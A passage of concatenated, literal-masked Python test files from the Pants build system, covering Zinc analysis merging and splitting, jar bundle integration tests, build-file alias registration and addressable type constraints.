total_time ) <EOL> def _generate_testworthy_splits ( self ) : <EOL> """<STR_LIT>""" <EOL> original_splits_dir = os . environ . get ( _TEST_DATA_SOURCE_ENV_VAR ) <EOL> canonical_dir = os . path . join ( original_splits_dir , '<STR_LIT>' ) <EOL> if os . path . exists ( canonical_dir ) : <EOL> shutil . rmtree ( canonical_dir , True ) <EOL> os . mkdir ( canonical_dir ) <EOL> original_split_filenames = [ f . decode ( '<STR_LIT:utf-8>' ) for f in os . listdir ( original_splits_dir ) ] <EOL> original_splits_files = [ os . path . join ( original_splits_dir , f ) <EOL> for f in original_split_filenames if f . endswith ( '<STR_LIT>' ) ] <EOL> parser = ZincAnalysisParser ( ) <EOL> original_split_analyses = [ parser . parse_from_path ( f ) for f in original_splits_files ] <EOL> merged_analysis = ZincAnalysis . merge ( original_split_analyses ) <EOL> merged_analysis . write_to_path ( os . path . join ( canonical_dir , '<STR_LIT>' ) ) <EOL> sources_per_analysis = [ a . stamps . sources . keys ( ) for a in original_split_analyses ] <EOL> split_analyses = merged_analysis . split ( sources_per_analysis , os . path . dirname ( __file__ ) ) <EOL> for original_split_file , split_analysis in zip ( original_splits_files , split_analyses ) : <EOL> outpath = os . path . join ( canonical_dir , os . path . basename ( original_split_file ) ) <EOL> split_analysis . write_to_path ( outpath ) <EOL> print ( '<STR_LIT>' . format ( canonical_dir ) ) <EOL> class ZincAnalysisTestLarge ( ZincAnalysisTestBase ) : <EOL> def test_large ( self ) : <EOL> parser = ZincAnalysisParser ( ) <EOL> with _temp_test_dir ( '<STR_LIT>' ) as testdir : <EOL> print ( '<STR_LIT>' . format ( testdir ) ) <EOL> analysis_file_names = [ b'<STR_LIT>' , b'<STR_LIT>' ] <EOL> analysis_files = [ os . path . join ( testdir , f ) for f in analysis_file_names ] <EOL> def msg ( prefix ) : <EOL> return '<STR_LIT>' . format ( prefix , '<STR_LIT:U+002CU+0020>' . join ( analysis_file_names ) ) <EOL> analyses = self . 
_time ( lambda : [ parser . parse_from_path ( f ) for f in analysis_files ] , <EOL> msg ( '<STR_LIT>' ) ) <EOL> writeout_dir = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> os . mkdir ( writeout_dir ) <EOL> def write ( file_name , analysis ) : <EOL> outpath = os . path . join ( writeout_dir , file_name ) <EOL> analysis . write_to_path ( outpath ) <EOL> def _write_all ( ) : <EOL> for analysis_file , analysis in zip ( analysis_files , analyses ) : <EOL> write ( os . path . basename ( analysis_file ) , analysis ) <EOL> self . _time ( _write_all , msg ( '<STR_LIT>' ) ) <EOL> merged_analysis = self . _time ( lambda : ZincAnalysis . merge ( analyses ) , msg ( '<STR_LIT>' ) ) <EOL> merged_analysis_path = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> self . _time ( lambda : merged_analysis . write_to_path ( merged_analysis_path ) , msg ( '<STR_LIT>' ) ) <EOL> sources_per_analysis = [ a . stamps . sources . keys ( ) for a in analyses ] <EOL> self . _time ( lambda : merged_analysis . split ( sources_per_analysis , catchall = True ) , msg ( '<STR_LIT>' ) ) <EOL> rebased_analysis_path = os . path . join ( testdir , b'<STR_LIT>' ) <EOL> self . _time ( lambda : ZincAnalysisParser ( ) . rebase_from_path ( merged_analysis_path , rebased_analysis_path , <EOL> b'<STR_LIT>' , b'<STR_LIT>' ) , msg ( '<STR_LIT>' ) ) <EOL> print ( '<STR_LIT>' % self . total_time ) <EOL> class ZincAnalysisTestSorting ( ZincAnalysisTestBase ) : <EOL> class FakeElement ( ZincAnalysisElement ) : <EOL> headers = ( '<STR_LIT:foo>' , ) <EOL> def test_sort ( self ) : <EOL> unsorted_arg = { '<STR_LIT:{}>' . format ( n ) : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] for n in range ( <NUM_LIT:9> , - <NUM_LIT:1> , - <NUM_LIT:1> ) } <EOL> expected = ( '<STR_LIT>' + <EOL> '<STR_LIT>' . join ( '<STR_LIT>' . format ( n = n ) for n in range ( <NUM_LIT:0> , <NUM_LIT:10> ) ) ) <EOL> def do_test ( elem ) : <EOL> for n in range ( <NUM_LIT:0> , <NUM_LIT:9> ) : <EOL> self . 
assertEquals ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , elem . args [ <NUM_LIT:0> ] [ '<STR_LIT:{}>' . format ( n ) ] ) <EOL> buf = StringIO . StringIO ( ) <EOL> elem . write ( buf ) <EOL> output = buf . getvalue ( ) <EOL> self . assertMultiLineEqual ( expected , output ) <EOL> always_sorted_elem = self . FakeElement ( [ unsorted_arg ] , always_sort = True ) <EOL> do_test ( always_sorted_elem ) <EOL> with environment_as ( ZINCUTILS_SORTED_ANALYSIS = '<STR_LIT:1>' ) : <EOL> unsorted_elem = self . FakeElement ( [ unsorted_arg ] ) <EOL> do_test ( unsorted_elem ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import subprocess <EOL> from contextlib import contextmanager <EOL> from shutil import rmtree <EOL> from pants . base . build_environment import get_buildroot <EOL> from pants_test . pants_run_integration_test import PantsRunIntegrationTest <EOL> class Bundles ( object ) : <EOL> """<STR_LIT>""" <EOL> phrase_path = '<STR_LIT>' <EOL> bundle_dir_prefix = '<STR_LIT>' <EOL> class Bundle ( object ) : <EOL> def __init__ ( self , spec , text ) : <EOL> self . spec = spec <EOL> self . text = text <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . spec , self . text ) ) <EOL> @ property <EOL> def full_spec ( self ) : <EOL> return '<STR_LIT>' . format ( project = Bundles . phrase_path , name = self . spec ) <EOL> lesser_of_two = Bundle ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> once_upon_a_time = Bundle ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> ten_thousand = Bundle ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> there_was_a_duck = Bundle ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> all_bundles = [ lesser_of_two , once_upon_a_time , ten_thousand , there_was_a_duck ] <EOL> class BundleIntegrationTest ( PantsRunIntegrationTest ) : <EOL> """<STR_LIT>""" <EOL> def _bundle_path ( self , bundle ) : <EOL> return os . path . join ( get_buildroot ( ) , '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( prefix = Bundles . bundle_dir_prefix , <EOL> name = bundle ) ) <EOL> @ contextmanager <EOL> def _handle_bundles ( self , names ) : <EOL> """<STR_LIT>""" <EOL> paths = [ self . _bundle_path ( name ) for name in names ] <EOL> jars = [ '<STR_LIT>' . format ( name = name ) for name in names ] <EOL> yield ( paths , jars ) <EOL> missing = [ ] <EOL> for path in paths : <EOL> if os . path . exists ( path ) : <EOL> rmtree ( path ) <EOL> else : <EOL> missing . append ( path ) <EOL> self . assertFalse ( missing , "<STR_LIT>" <EOL> . 
format ( missing = '<STR_LIT:U+002CU+0020>' . join ( missing ) ) ) <EOL> def _test_bundle_existences ( self , args , bundles , config = None ) : <EOL> all_bundles = set ( bundle . spec for bundle in Bundles . all_bundles ) <EOL> all_paths = [ self . _bundle_path ( bundle ) for bundle in all_bundles ] <EOL> names = [ bundle . spec for bundle in bundles ] <EOL> outputs = [ bundle . text for bundle in bundles ] <EOL> for path in all_paths : <EOL> if os . path . exists ( path ) : <EOL> rmtree ( path ) <EOL> with self . _handle_bundles ( names ) as ( paths , jars ) : <EOL> with self . pants_results ( [ '<STR_LIT>' ] + args , config = config ) as pants_run : <EOL> self . assert_success ( pants_run ) <EOL> for path , jar , expected in zip ( paths , jars , outputs ) : <EOL> java_run = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , jar ] , <EOL> stdout = subprocess . PIPE , <EOL> cwd = path ) <EOL> java_retcode = java_run . wait ( ) <EOL> java_out = java_run . stdout . read ( ) <EOL> self . assertEquals ( java_retcode , <NUM_LIT:0> ) <EOL> self . assertTrue ( expected in java_out , "<STR_LIT>" <EOL> . format ( output = expected , jar = jar , stdout = java_out ) ) <EOL> lingering = [ path for path in all_paths if os . path . exists ( path ) ] <EOL> self . assertTrue ( not lingering , "<STR_LIT>" <EOL> . format ( bundles = '<STR_LIT:U+002CU+0020>' . join ( lingering ) ) ) <EOL> def test_single_run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . lesser_of_two . full_spec ] , <EOL> [ Bundles . lesser_of_two ] , <EOL> ) <EOL> def test_double_run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . lesser_of_two . full_spec , Bundles . once_upon_a_time . full_spec ] , <EOL> [ Bundles . lesser_of_two , Bundles . once_upon_a_time ] , <EOL> ) <EOL> def test_all_run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . phrase_path + '<STR_LIT>' ] , <EOL> Bundles . 
all_bundles , <EOL> ) <EOL> def test_exclude_lesser ( self ) : <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . phrase_path + '<STR_LIT>' , '<STR_LIT>' ] , <EOL> set ( Bundles . all_bundles ) - { Bundles . lesser_of_two } , <EOL> ) <EOL> def test_exclude_thoe ( self ) : <EOL> self . _test_bundle_existences ( <EOL> [ Bundles . phrase_path + '<STR_LIT>' , r'<STR_LIT>' , ] , <EOL> set ( Bundles . all_bundles ) - { Bundles . there_was_a_duck , Bundles . ten_thousand } , <EOL> ) <EOL> def test_exclude_two ( self ) : <EOL> self . _test_bundle_existences ( [ <EOL> Bundles . phrase_path + '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> set ( Bundles . all_bundles ) - { Bundles . there_was_a_duck , Bundles . once_upon_a_time } , <EOL> ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import unittest <EOL> from contextlib import contextmanager <EOL> from pants . base . build_file import BuildFile <EOL> from pants . base . file_system_project_tree import FileSystemProjectTree <EOL> from pants . build_graph . build_configuration import BuildConfiguration <EOL> from pants . build_graph . build_file_aliases import BuildFileAliases , TargetMacro <EOL> from pants . build_graph . target import Target <EOL> from pants . util . contextutil import temporary_dir <EOL> from pants . util . dirutil import touch <EOL> class BuildConfigurationTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . build_configuration = BuildConfiguration ( ) <EOL> def _register_aliases ( self , ** kwargs ) : <EOL> self . build_configuration . register_aliases ( BuildFileAliases ( ** kwargs ) ) <EOL> def test_register_bad ( self ) : <EOL> with self . assertRaises ( TypeError ) : <EOL> self . build_configuration . register_aliases ( <NUM_LIT> ) <EOL> def test_register_target_alias ( self ) : <EOL> class Fred ( Target ) : <EOL> pass <EOL> self . _register_aliases ( targets = { '<STR_LIT>' : Fred } ) <EOL> aliases = self . build_configuration . registered_aliases ( ) <EOL> self . assertEqual ( { } , aliases . target_macro_factories ) <EOL> self . assertEqual ( { } , aliases . objects ) <EOL> self . assertEqual ( { } , aliases . context_aware_object_factories ) <EOL> self . assertEqual ( dict ( fred = Fred ) , aliases . target_types ) <EOL> with self . _create_mock_build_file ( '<STR_LIT>' ) as build_file : <EOL> parse_state = self . build_configuration . initialize_parse_state ( build_file ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( parse_state . registered_addressable_instances ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . 
parse_globals ) ) <EOL> target_call_proxy = parse_state . parse_globals [ '<STR_LIT>' ] <EOL> target_call_proxy ( name = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . registered_addressable_instances ) ) <EOL> name , target_proxy = parse_state . registered_addressable_instances . pop ( ) <EOL> self . assertEqual ( '<STR_LIT>' , target_proxy . addressed_name ) <EOL> self . assertEqual ( Fred , target_proxy . addressed_type ) <EOL> def test_register_target_macro_facory ( self ) : <EOL> class Fred ( Target ) : <EOL> pass <EOL> class FredMacro ( TargetMacro ) : <EOL> def __init__ ( self , parse_context ) : <EOL> self . _parse_context = parse_context <EOL> def expand ( self , * args , ** kwargs ) : <EOL> return self . _parse_context . create_object ( Fred , name = '<STR_LIT>' , dependencies = [ kwargs [ '<STR_LIT:name>' ] ] ) <EOL> class FredFactory ( TargetMacro . Factory ) : <EOL> @ property <EOL> def target_types ( self ) : <EOL> return { Fred } <EOL> def macro ( self , parse_context ) : <EOL> return FredMacro ( parse_context ) <EOL> factory = FredFactory ( ) <EOL> self . _register_aliases ( targets = { '<STR_LIT>' : factory } ) <EOL> aliases = self . build_configuration . registered_aliases ( ) <EOL> self . assertEqual ( { } , aliases . target_types ) <EOL> self . assertEqual ( { } , aliases . objects ) <EOL> self . assertEqual ( { } , aliases . context_aware_object_factories ) <EOL> self . assertEqual ( dict ( fred = factory ) , aliases . target_macro_factories ) <EOL> with self . _create_mock_build_file ( '<STR_LIT>' ) as build_file : <EOL> parse_state = self . build_configuration . initialize_parse_state ( build_file ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( parse_state . registered_addressable_instances ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . parse_globals ) ) <EOL> target_call_proxy = parse_state . parse_globals [ '<STR_LIT>' ] <EOL> target_call_proxy ( name = '<STR_LIT>' ) <EOL> self . 
assertEqual ( <NUM_LIT:1> , len ( parse_state . registered_addressable_instances ) ) <EOL> name , target_proxy = parse_state . registered_addressable_instances . pop ( ) <EOL> self . assertEqual ( '<STR_LIT>' , target_proxy . addressed_name ) <EOL> self . assertEqual ( Fred , target_proxy . addressed_type ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , target_proxy . dependency_specs ) <EOL> def test_register_exposed_object ( self ) : <EOL> self . _register_aliases ( objects = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> aliases = self . build_configuration . registered_aliases ( ) <EOL> self . assertEqual ( { } , aliases . target_types ) <EOL> self . assertEqual ( { } , aliases . target_macro_factories ) <EOL> self . assertEqual ( { } , aliases . context_aware_object_factories ) <EOL> self . assertEqual ( dict ( jane = <NUM_LIT> ) , aliases . objects ) <EOL> with self . _create_mock_build_file ( '<STR_LIT>' ) as build_file : <EOL> parse_state = self . build_configuration . initialize_parse_state ( build_file ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( parse_state . registered_addressable_instances ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . parse_globals ) ) <EOL> self . assertEqual ( <NUM_LIT> , parse_state . parse_globals [ '<STR_LIT>' ] ) <EOL> def test_register_exposed_context_aware_function ( self ) : <EOL> self . do_test_exposed_context_aware_function ( lambda context : lambda : context . rel_path ) <EOL> self . do_test_exposed_context_aware_function ( lambda context = None : lambda : context . rel_path ) <EOL> def george_method ( self , parse_context ) : <EOL> return lambda : parse_context . rel_path <EOL> def test_register_exposed_context_aware_method ( self ) : <EOL> self . do_test_exposed_context_aware_function ( self . george_method ) <EOL> @ classmethod <EOL> def george_classmethod ( cls , parse_context ) : <EOL> return lambda : parse_context . rel_path <EOL> def test_register_exposed_context_aware_classmethod ( self ) : <EOL> self . 
do_test_exposed_context_aware_function ( self . george_classmethod ) <EOL> @ staticmethod <EOL> def george_staticmethod ( parse_context ) : <EOL> return lambda : parse_context . rel_path <EOL> def test_register_exposed_context_aware_staticmethod ( self ) : <EOL> self . do_test_exposed_context_aware_function ( self . george_staticmethod ) <EOL> def do_test_exposed_context_aware_function ( self , func , * args , ** kwargs ) : <EOL> with self . do_test_exposed_context_aware_object ( func ) as context_aware_object : <EOL> self . assertEqual ( '<STR_LIT>' , context_aware_object ( * args , ** kwargs ) ) <EOL> def test_register_exposed_context_aware_class ( self ) : <EOL> class George ( object ) : <EOL> def __init__ ( self , parse_context ) : <EOL> self . _parse_context = parse_context <EOL> def honorific ( self ) : <EOL> return len ( self . _parse_context . rel_path ) <EOL> with self . do_test_exposed_context_aware_object ( George ) as context_aware_object : <EOL> self . assertEqual ( <NUM_LIT:6> , context_aware_object . honorific ( ) ) <EOL> @ contextmanager <EOL> def do_test_exposed_context_aware_object ( self , context_aware_object_factory ) : <EOL> self . _register_aliases ( context_aware_object_factories = { '<STR_LIT>' : context_aware_object_factory } ) <EOL> aliases = self . build_configuration . registered_aliases ( ) <EOL> self . assertEqual ( { } , aliases . target_types ) <EOL> self . assertEqual ( { } , aliases . target_macro_factories ) <EOL> self . assertEqual ( { } , aliases . objects ) <EOL> self . assertEqual ( dict ( george = context_aware_object_factory ) , <EOL> aliases . context_aware_object_factories ) <EOL> with temporary_dir ( ) as root : <EOL> build_file_path = os . path . join ( root , '<STR_LIT>' , '<STR_LIT>' ) <EOL> touch ( build_file_path ) <EOL> build_file = BuildFile ( FileSystemProjectTree ( root ) , '<STR_LIT>' ) <EOL> parse_state = self . build_configuration . initialize_parse_state ( build_file ) <EOL> self . 
assertEqual ( <NUM_LIT:0> , len ( parse_state . registered_addressable_instances ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( parse_state . parse_globals ) ) <EOL> yield parse_state . parse_globals [ '<STR_LIT>' ] <EOL> @ contextmanager <EOL> def _create_mock_build_file ( self , dirname ) : <EOL> with temporary_dir ( ) as root : <EOL> os . mkdir ( os . path . join ( root , dirname ) ) <EOL> touch ( os . path . join ( root , dirname , '<STR_LIT>' ) ) <EOL> yield BuildFile ( FileSystemProjectTree ( root ) , os . path . join ( dirname , '<STR_LIT>' ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import unittest <EOL> from pants . engine . exp . addressable import ( Exactly , MutationError , NotSerializableError , <EOL> SubclassesOf , SuperclassesOf , TypeConstraintError , <EOL> addressable , addressable_dict , addressable_list ) <EOL> from pants . engine . exp . objects import Resolvable , Serializable <EOL> class TypeConstraintTestBase ( unittest . TestCase ) : <EOL> class A ( object ) : <EOL> pass <EOL> class B ( A ) : <EOL> pass <EOL> class C ( B ) : <EOL> pass <EOL> class BPrime ( A ) : <EOL> pass <EOL> class SuperclassesOfTest ( TypeConstraintTestBase ) : <EOL> def test_none ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> SubclassesOf ( ) <EOL> def test_single ( self ) : <EOL> superclasses_of_b = SuperclassesOf ( self . B ) <EOL> self . assertEqual ( ( self . B , ) , superclasses_of_b . types ) <EOL> self . assertTrue ( superclasses_of_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( superclasses_of_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( superclasses_of_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( superclasses_of_b . satisfied_by ( self . C ( ) ) ) <EOL> def test_multiple ( self ) : <EOL> superclasses_of_a_or_b = SuperclassesOf ( self . A , self . B ) <EOL> self . assertEqual ( ( self . A , self . B ) , superclasses_of_a_or_b . types ) <EOL> self . assertTrue ( superclasses_of_a_or_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( superclasses_of_a_or_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( superclasses_of_a_or_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( superclasses_of_a_or_b . satisfied_by ( self . C ( ) ) ) <EOL> class ExactlyTest ( TypeConstraintTestBase ) : <EOL> def test_none ( self ) : <EOL> with self . 
assertRaises ( ValueError ) : <EOL> Exactly ( ) <EOL> def test_single ( self ) : <EOL> exactly_b = Exactly ( self . B ) <EOL> self . assertEqual ( ( self . B , ) , exactly_b . types ) <EOL> self . assertFalse ( exactly_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( exactly_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( exactly_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( exactly_b . satisfied_by ( self . C ( ) ) ) <EOL> def test_multiple ( self ) : <EOL> exactly_a_or_b = Exactly ( self . A , self . B ) <EOL> self . assertEqual ( ( self . A , self . B ) , exactly_a_or_b . types ) <EOL> self . assertTrue ( exactly_a_or_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( exactly_a_or_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( exactly_a_or_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertFalse ( exactly_a_or_b . satisfied_by ( self . C ( ) ) ) <EOL> class SubclassesOfTest ( TypeConstraintTestBase ) : <EOL> def test_none ( self ) : <EOL> with self . assertRaises ( ValueError ) : <EOL> SubclassesOf ( ) <EOL> def test_single ( self ) : <EOL> subclasses_of_b = SubclassesOf ( self . B ) <EOL> self . assertEqual ( ( self . B , ) , subclasses_of_b . types ) <EOL> self . assertFalse ( subclasses_of_b . satisfied_by ( self . A ( ) ) ) <EOL> self . assertTrue ( subclasses_of_b . satisfied_by ( self . B ( ) ) ) <EOL> self . assertFalse ( subclasses_of_b . satisfied_by ( self . BPrime ( ) ) ) <EOL> self . assertTrue ( subclasses_of_b . satisfied_by ( self . C ( ) ) ) <EOL> def test_multiple ( self ) : <EOL> subclasses_of_b_or_c = SubclassesOf ( self . B , self . C ) <EOL> self . assertEqual ( ( self . B , self . C ) , subclasses_of_b_or_c . types ) <EOL> self . assertTrue ( subclasses_of_b_or_c . satisfied_by ( self . B ( ) ) ) <EOL> self . assertTrue ( subclasses_of_b_or_c . satisfied_by ( self . C ( ) ) ) <EOL> self . assertFalse ( subclasses_of_b_or_c . satisfied_by ( self . 
BPrime ( ) ) ) <EOL> self . assertFalse ( subclasses_of_b_or_c . satisfied_by ( self . A ( ) ) ) <EOL> class SimpleSerializable ( Serializable ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . _kwargs = kwargs <EOL> def _asdict ( self ) : <EOL> return self . _kwargs <EOL> class CountingResolvable ( Resolvable ) : <EOL> def __init__ ( self , address , value ) : <EOL> self . _address = address <EOL> self . _value = value <EOL> self . _resolutions = <NUM_LIT:0> <EOL> @ property <EOL> def address ( self ) : <EOL> return self . _address <EOL> def resolve ( self ) : <EOL> try : <EOL> return self . _value <EOL> finally : <EOL> self . _resolutions += <NUM_LIT:1> <EOL> @ property <EOL> def resolutions ( self ) : <EOL> return self . _resolutions <EOL> class AddressableDescriptorTest ( unittest . TestCase ) : <EOL> def test_inappropriate_application ( self ) : <EOL> class NotSerializable ( object ) : <EOL> def __init__ ( self , count ) : <EOL> super ( NotSerializable , self ) . __init__ ( ) <EOL> self . count = count <EOL> @ addressable ( Exactly ( int ) ) <EOL> def count ( self ) : <EOL> pass <EOL> with self . assertRaises ( NotSerializableError ) : <EOL> NotSerializable ( <NUM_LIT> ) <EOL> class AddressableTest ( unittest . TestCase ) : <EOL> class Person ( SimpleSerializable ) : <EOL> def __init__ ( self , age ) : <EOL> super ( AddressableTest . Person , self ) . __init__ ( ) <EOL> self . age = age <EOL> @ addressable ( Exactly ( int ) ) <EOL> def age ( self ) : <EOL> """<STR_LIT>""" <EOL> def test_none ( self ) : <EOL> person = self . Person ( None ) <EOL> self . assertIsNone ( person . age , None ) <EOL> def test_value ( self ) : <EOL> person = self . Person ( <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , person . age ) <EOL> def test_address ( self ) : <EOL> person = self . Person ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , person . 
age ) <EOL> def test_resolvable ( self ) : <EOL> resolvable_age = CountingResolvable ( '<STR_LIT>' , <NUM_LIT> ) <EOL> person = self . Person ( resolvable_age ) <EOL> self . assertEqual ( <NUM_LIT:0> , resolvable_age . resolutions ) <EOL> self . assertEqual ( <NUM_LIT> , person . age ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_age . resolutions ) <EOL> self . assertEqual ( <NUM_LIT> , person . age ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_age . resolutions ) <EOL> def test_type_mismatch_value ( self ) : <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> self . Person ( <NUM_LIT> ) <EOL> def test_type_mismatch_resolvable ( self ) : <EOL> resolvable_age = CountingResolvable ( '<STR_LIT>' , <NUM_LIT> ) <EOL> person = self . Person ( resolvable_age ) <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> person . age <EOL> def test_single_assignment ( self ) : <EOL> person = self . Person ( <NUM_LIT> ) <EOL> with self . assertRaises ( MutationError ) : <EOL> person . age = <NUM_LIT> <EOL> class AddressableListTest ( unittest . TestCase ) : <EOL> class Series ( SimpleSerializable ) : <EOL> def __init__ ( self , values ) : <EOL> super ( AddressableListTest . Series , self ) . __init__ ( ) <EOL> self . values = values <EOL> @ addressable_list ( Exactly ( int , float ) ) <EOL> def values ( self ) : <EOL> """<STR_LIT>""" <EOL> def test_none ( self ) : <EOL> series = self . Series ( None ) <EOL> self . assertEqual ( [ ] , series . values ) <EOL> def test_values ( self ) : <EOL> series = self . Series ( [ <NUM_LIT> , <NUM_LIT:1> / <NUM_LIT> ] ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT:1> / <NUM_LIT> ] , series . values ) <EOL> def test_addresses ( self ) : <EOL> series = self . Series ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , series . values ) <EOL> def test_resolvables ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ) <EOL> series = self . 
Series ( [ resolvable_value ] ) <EOL> self . assertEqual ( [ <NUM_LIT:1> / <NUM_LIT> ] , series . values ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_value . resolutions ) <EOL> self . assertEqual ( <NUM_LIT:1> / <NUM_LIT> , series . values [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_value . resolutions ) <EOL> def test_mixed ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ) <EOL> series = self . Series ( [ <NUM_LIT> , '<STR_LIT>' , resolvable_value ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , resolvable_value . resolutions ) <EOL> self . assertEqual ( [ <NUM_LIT> , '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ] , series . values ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_value . resolutions ) <EOL> self . assertEqual ( <NUM_LIT:1> / <NUM_LIT> , series . values [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_value . resolutions ) <EOL> def test_type_mismatch_container ( self ) : <EOL> with self . assertRaises ( TypeError ) : <EOL> self . Series ( { <NUM_LIT> , <NUM_LIT:1> / <NUM_LIT> } ) <EOL> def test_type_mismatch_value ( self ) : <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> self . Series ( [ <NUM_LIT> , False ] ) <EOL> def test_type_mismatch_resolvable ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , True ) <EOL> series = self . Series ( [ <NUM_LIT> , resolvable_value ] ) <EOL> with self . assertRaises ( TypeConstraintError ) : <EOL> series . values <EOL> def test_single_assignment ( self ) : <EOL> series = self . Series ( [ <NUM_LIT> ] ) <EOL> with self . assertRaises ( MutationError ) : <EOL> series . values = [ <NUM_LIT> ] <EOL> class AddressableDictTest ( unittest . TestCase ) : <EOL> class Varz ( SimpleSerializable ) : <EOL> def __init__ ( self , varz ) : <EOL> super ( AddressableDictTest . Varz , self ) . __init__ ( ) <EOL> self . 
varz = varz <EOL> @ addressable_dict ( Exactly ( int , float ) ) <EOL> def varz ( self ) : <EOL> """<STR_LIT>""" <EOL> def test_none ( self ) : <EOL> varz = self . Varz ( None ) <EOL> self . assertEqual ( { } , varz . varz ) <EOL> def test_values ( self ) : <EOL> varz = self . Varz ( { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } ) <EOL> self . assertEqual ( { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } , varz . varz ) <EOL> def test_addresses ( self ) : <EOL> varz = self . Varz ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , varz . varz ) <EOL> def test_resolvables ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ) <EOL> varz = self . Varz ( { '<STR_LIT>' : resolvable_value } ) <EOL> self . assertEqual ( { '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } , varz . varz ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_value . resolutions ) <EOL> self . assertEqual ( <NUM_LIT:1> / <NUM_LIT> , varz . varz [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_value . resolutions ) <EOL> def test_mixed ( self ) : <EOL> resolvable_value = CountingResolvable ( '<STR_LIT>' , <NUM_LIT:1> / <NUM_LIT> ) <EOL> varz = self . Varz ( { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : resolvable_value } ) <EOL> self . assertEqual ( <NUM_LIT:0> , resolvable_value . resolutions ) <EOL> self . assertEqual ( { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> / <NUM_LIT> } , <EOL> varz . varz ) <EOL> self . assertEqual ( <NUM_LIT:1> , resolvable_value . resolutions ) <EOL> self . assertEqual ( <NUM_LIT:1> / <NUM_LIT> , varz . varz [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:2> , resolvable_value . resolutions ) 